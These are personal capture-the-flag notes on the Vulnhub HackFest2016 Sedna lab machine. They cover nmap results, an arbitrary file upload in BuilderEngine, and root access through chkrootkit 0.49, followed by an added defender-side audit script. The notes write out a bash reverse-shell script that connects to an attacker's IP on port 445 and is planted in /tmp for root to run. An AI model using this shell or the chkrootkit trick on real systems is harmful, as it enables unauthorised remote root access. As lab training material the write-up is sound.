
32 VM hackfest2016: Sedna

Walkthru:

A. https://mendidsiren63.blogspot.com/2017/05/vulnhub-hackfest2016sedna-walkthrough.html [PUT method giving access forbidden, POSTER plugin renaming a file, exploit.html to POST a file for BuilderEngine 3.5.0 - Arbitrary File Upload vulnerability, netcat with netcat /dev/tcp, exploit 33899]

B. http://www.waywardpaladin.com/index.php?op=ViewArticle&articleId=3&blogId=1 [command line reverse shell, firefart or exploit 40839 but I am getting an error upon compilation]

C. https://medium.com/@3wem/hackfest2016-sedna-ctf-de95f2ab0b4f [metasploit]

D. https://www.n00py.io/2017/03/vulnhub-walkthrough-hackfest2016-sedna/ [dirtycow]

Notes:

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp  open  pop3        Dovecot pop3d
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp  open  ssl/pop3    Dovecot pop3d
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
54985/tcp open  unknown
MAC Address: 08:00:27:29:F0:BD (Oracle VirtualBox virtual NIC)
00000000000000000000000000
Ran dirb and nikto on ports 80 and 8080 and found some interesting folders/files and Java Server Pages (JSP), some giving 403 access forbidden. JSP and Coyote show many pages but nothing significant.
Some vulns but nothing worked. Ran smb cmds but nothing so far. Robots.txt also didn't show anything, nor did the PUT method, which also showed 403 access forbidden. Tried hydra for SMB and SSH for user "victor" but nothing.
00000000000000000000000000
Used https://www.exploit-db.com/exploits/40390/ to upload an arbitrary file. Tried to upload a file using the POSTER plugin, but it would rename the file and remove the PHP extension. The exploit also has HTML code that can be used to upload a reverse shell file using the POST method.

$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ pwd
/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls /home

Tried many exploits for priv escalation but they didn't work. I decided to do more enumeration and found out chkrootkit is installed on the machine. To our luck, version 0.49 is installed. This was found by a privilege escalation script.

Searching with searchsploit, we found an exploit for chkrootkit version 0.49. As per the vulnerability, chkrootkit will execute all the files with root privileges. We will now create a bash script for a reverse shell and wget it into the "tmp" folder (192.168.213.149 is Kali in this case):

#! /bin/bash
bash -i >& /dev/tcp/192.168.213.149/445 0>&1

Once the script is ready, we will wget the script into the "tmp" directory and make it executable.

Now we will start the listener on port 445 on our attacker machine and wait for the file to execute and send the reverse shell, which happened after 5-15 minutes. I could run it manually, but it would give me www access only.
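
A defender-side check for the chkrootkit finding above, as an added example that is not part of the original post: it flags the 0.49 version, lists executables in a world-writable directory that root does not own, and shows where chkrootkit is scheduled. The function names, the "0.NN" version format and the sample banner are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original post: defender-side audit for the
# chkrootkit 0.49 finding. All function names here are hypothetical.

# Pull the version number out of a banner such as "chkrootkit version 0.49".
parse_version() {
    printf '%s\n' "$1" | sed -n 's/.*version \([0-9][0-9.]*\).*/\1/p'
}

# Succeed when the version is 0.49 or lower (assumption: "0.NN" numbering).
is_affected_version() {
    [ -n "$1" ] || return 1
    awk -v v="$1" 'BEGIN { split(v, a, "."); exit !(a[1] + 0 == 0 && a[2] + 0 <= 49) }'
}

# List executable regular files directly under a directory (default /tmp)
# that are not owned by the trusted uid (default 0, root). A root-run scanner
# that executes anything from there would run them with root privileges.
untrusted_executables() {
    dir="${1:-/tmp}"; trusted_uid="${2:-0}"
    find "$dir" -maxdepth 1 -type f ! -user "$trusted_uid" \
        \( -perm -100 -o -perm -010 -o -perm -001 \) 2>/dev/null | sort
}

# List files under the given cron locations that mention chkrootkit,
# i.e. the places where root runs it on a schedule.
scheduled_runs() {
    grep -rl 'chkrootkit' "$@" 2>/dev/null | sort
}

# Print a short report. $1 = version banner, $2 = directory to inspect.
audit() {
    ver=$(parse_version "$1")
    if is_affected_version "$ver"; then
        echo "FINDING: chkrootkit $ver is affected, upgrade the package"
    else
        echo "OK: chkrootkit version '${ver:-unknown}' not flagged"
    fi
    untrusted_executables "${2:-/tmp}" | sed 's/^/REVIEW: /'
    scheduled_runs /etc/cron.d /etc/cron.daily /etc/crontab | sed 's/^/SCHEDULED: /'
}

# Constructed banner matching the version named in the post; on a real host
# use the output of `chkrootkit -V` instead.
audit "chkrootkit version 0.49" /tmp
```

A SCHEDULED line together with a FINDING line matches the delayed root execution described in the notes above.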
